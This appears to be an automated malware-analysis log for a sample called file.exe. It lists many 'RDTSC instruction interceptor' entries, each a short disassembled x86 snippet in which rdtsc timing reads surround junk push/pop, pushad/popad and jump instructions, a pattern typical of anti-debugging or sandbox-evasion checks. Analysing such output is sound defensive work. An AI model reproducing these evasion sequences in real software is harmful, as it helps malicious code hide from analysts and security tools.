Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4CAA second address: CA4CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC41D10CDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC41D10CDDAh 0x00000012 jg 00007FC41D10CDD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4CC7 second address: CA4CD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC41C7769D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA528A second address: CA52AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jno 00007FC41D10CDDCh 0x0000000b push ebx 0x0000000c jmp 00007FC41D10CDDDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5826 second address: CA582C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA582C second address: CA5855 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41D10CDD8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FC41D10CDE8h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5855 second address: CA585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA585B second address: CA5866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA5866 second address: CA587E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41C7769E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA587E second address: CA588D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41D10CDDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA588D second address: CA5896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA637C second address: CA6386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAF2F second address: CAAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAF33 second address: CAAF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA0C8 second address: CAA0F1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC41C7769D6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC41C7769DDh 0x00000014 pop esi 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007FC41C7769D6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA0F1 second address: CAA0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA0F5 second address: CAA119 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41C7769D6h 0x00000008 jp 00007FC41C7769D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007FC41C7769DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FC41C7769D6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA3BB second address: CAA3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FC41D10CDD6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FC41D10CDDDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA3E9 second address: CAA408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769E1h 0x00000007 jc 00007FC41C7769D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA408 second address: CAA40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA91B second address: CAA956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC41C7769DEh 0x0000000e jmp 00007FC41C7769E7h 0x00000013 ja 00007FC41C7769D6h 0x00000019 popad 0x0000001a pop ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA956 second address: CAA95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA95C second address: CAA966 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41C7769D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA966 second address: CAA970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA970 second address: CAA980 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC41C7769D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAA980 second address: CAA984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAACC second address: CAAADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAADF second address: CAAAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAAF5 second address: CAAAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAAFB second address: CAAB10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FC41D10CDF6h 0x0000000d ja 00007FC41D10CDDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAB10 second address: CAAB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAB18 second address: CAAB22 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D10CDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAC71 second address: CAAC8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769DCh 0x00000007 jp 00007FC41C7769D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC41C7769D8h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8440 second address: CB8444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB6649 second address: CB664D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB664D second address: CB6655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB6655 second address: CB665C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB6C1D second address: CB6C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7128 second address: CB7130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7470 second address: CB7474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7474 second address: CB7480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC41C7769D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7480 second address: CB7489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7B72 second address: CB7B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7B76 second address: CB7B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7B7C second address: CB7B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC41C7769D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB61E3 second address: CB61F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC41D10CDDCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB61F5 second address: CB6209 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41C7769DCh 0x00000008 js 00007FC41C7769D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD6C7 second address: CBD6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC41D10CDDFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD6DF second address: CBD6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD96B second address: CBD977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC41D10CDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD977 second address: CBD97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD97C second address: CBD98A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC41D10CDD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD98A second address: CBD98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF2AD second address: CBF2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF2B1 second address: CBF2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FC41C7769D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9FE5 second address: CC9FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC41D10CDD6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9FF2 second address: CCA010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC41C7769E7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA010 second address: CCA01E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA01E second address: CCA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA02B second address: CCA07A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FC41D10CDE7h 0x00000016 popad 0x00000017 jmp 00007FC41D10CDDFh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC41D10CDDFh 0x00000023 jns 00007FC41D10CDD6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDAD3 second address: CCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC41C7769E2h 0x0000000b jne 00007FC41C7769D6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDAF2 second address: CCDAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC41D10CDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDAFD second address: CCDB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD567 second address: CCD571 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD571 second address: CCD57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC41C7769D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD57B second address: CCD5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC41D10CDDCh 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC41D10CDDFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD708 second address: CCD74F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41C7769DAh 0x00000008 jp 00007FC41C7769D8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jnl 00007FC41C7769D6h 0x0000001a pushad 0x0000001b popad 0x0000001c jnp 00007FC41C7769D6h 0x00000022 popad 0x00000023 jmp 00007FC41C7769E6h 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007FC41C7769D6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD74F second address: CCD753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDE86 second address: CDDE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDE9E second address: CDDEB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41D10CDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FC41D10CDD8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDEB0 second address: CDDEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD3E second address: CDDD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD42 second address: CDDD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1BEA second address: CE1BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1AAD second address: CE1AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5CA1 second address: CE5CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5CAB second address: CE5CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1049h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5CCD second address: CE5D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FC41D25BAD3h 0x0000000b jmp 00007FC41D25BAD7h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC41D25BAD8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5FD8 second address: CE5FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5FDE second address: CE5FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5FE2 second address: CE604D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC41CBA1036h 0x00000008 jns 00007FC41CBA1036h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FC41CBA1041h 0x00000016 jng 00007FC41CBA1036h 0x0000001c jmp 00007FC41CBA1045h 0x00000021 popad 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 jg 00007FC41CBA1036h 0x0000002e pop ecx 0x0000002f pushad 0x00000030 jng 00007FC41CBA1036h 0x00000036 jmp 00007FC41CBA1047h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE604D second address: CE605E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BACCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE605E second address: CE6077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CBA103Fh 0x00000009 jg 00007FC41CBA1036h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE6077 second address: CE607B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE64A1 second address: CE64A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE64A5 second address: CE6514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D25BACBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FC41D25BACCh 0x00000025 jnp 00007FC41D25BAC6h 0x0000002b jmp 00007FC41D25BAD1h 0x00000030 popad 0x00000031 jmp 00007FC41D25BAD8h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE6514 second address: CE6519 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE665F second address: CE666C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41D25BAC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE666C second address: CE6689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1048h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE70F8 second address: CE70FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE70FF second address: CE7112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FC41CBA1052h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE7112 second address: CE7116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CED048 second address: CED04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECBC8 second address: CECBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECBD1 second address: CECBDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC41CBA1036h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECBDE second address: CECBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
